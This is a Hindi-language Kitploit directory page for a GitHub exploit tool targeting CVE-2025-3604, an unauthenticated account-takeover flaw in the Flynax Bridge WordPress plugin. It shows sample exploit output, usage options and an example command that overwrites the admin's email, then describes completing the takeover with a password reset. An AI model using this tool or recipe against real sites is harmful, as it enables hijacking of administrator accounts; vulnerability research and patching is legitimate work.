Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/nxploited/cve-2025-3604
प्रमाणीकरण और प्राधिकरणविशेषाधिकार वृद्धिपासवर्ड हमलेभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubnxploited/cve-2025-3604

CVE-2025-3604

Flynax Bridge <= 2.2.0 - बिना प्रमाणीकरण के खाता अधिग्रहण द्वारा विशेषाधिकार वृद्धि

रिपॉजिटरी देखें
121 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🚨 Flynax Bridge <= 2.2.0 - अप्रमाणित विशेषाधिकार वृद्धि खाता अधिग्रहण के माध्यम से

📄 विवरण

WordPress के लिए Flynax Bridge प्लगइन 2.2.0 तक के सभी संस्करणों में खाता अधिग्रहण के माध्यम से विशेषाधिकार वृद्धि के लिए संवेदनशील है।

यह प्लगइन द्वारा उपयोगकर्ता के खाता विवरण (जैसे ईमेल) को अपडेट करने से पहले उसकी पहचान को ठीक से सत्यापित न करने के कारण होता है। परिणामस्वरूप, अप्रमाणित हमलावर किसी भी उपयोगकर्ता, जिसमें प्रशासक भी शामिल हैं, का ईमेल पता बदल सकते हैं, और फिर खाते को पूरी तरह से अपने कब्जे में लेने के लिए पासवर्ड रीसेट शुरू कर सकते हैं।

CVE: CVE-2025-3604
CVSS: 9.8 (गंभीर)
प्रकाशित: 23 अप्रैल, 2025
अंतिम अद्यतन: 24 अप्रैल, 2025


⚙️ स्क्रिप्ट आउटपुट उदाहरण

root@kitploit:~
Detected plugin version: 2.2.0
Version is vulnerable. Attempting exploit...
Exploit succeeded! Email changed to: [email protected]
Exploit By Nxploited (Khaled_alenazi) | https://github.com/Nxploited

सफल शोषण के बाद, हमलावर WordPress लॉगिन पेज पर जा सकता है और नए सेट किए गए ईमेल का उपयोग करके "अपना पासवर्ड खो गए?" पर क्लिक करके पासवर्ड रीसेट कर सकता है और लक्षित खाते तक पूर्ण पहुंच प्राप्त कर सकता है।


🚀 उपयोग

root@kitploit:~
usage: CVE-2025-3604.py [-h] -u URL [-mail NEWMAIL] -id USER_ID

WordPress Flynax Bridge Unauthenticated Privilege Escalation via Account # By Nxploited (Khaled Alenazi)

options:
  -h, --help              show this help message and exit
  -u, --url URL           Target URL
  -mail, --newmail NEWMAIL
                          New email to set
  -id, --user_id USER_ID  User ID to exploit

🧪 उदाहरण

root@kitploit:~
python3 CVE-2025-3604.py -u "http://TARGET/wordpress/" -id "1" -mail "[email protected]"

स्पष्टीकरण:

  • -u: WordPress साइट का आधार URL।
  • -id: लक्षित करने के लिए उपयोगकर्ता का आईडी (सामान्यतः एडमिन के लिए 1)।
  • -mail: उस उपयोगकर्ता के लिए सेट किया जाने वाला नया ईमेल।

⚠️ अस्वीकरण

अपने जोखिम पर उपयोग करें। केवल अधिकृत परीक्षण और शैक्षिक उद्देश्यों के लिए।

🧑‍💻

द्वारा: Nxploited ( Khaled_alenazi )

टूल डाउनलोड करें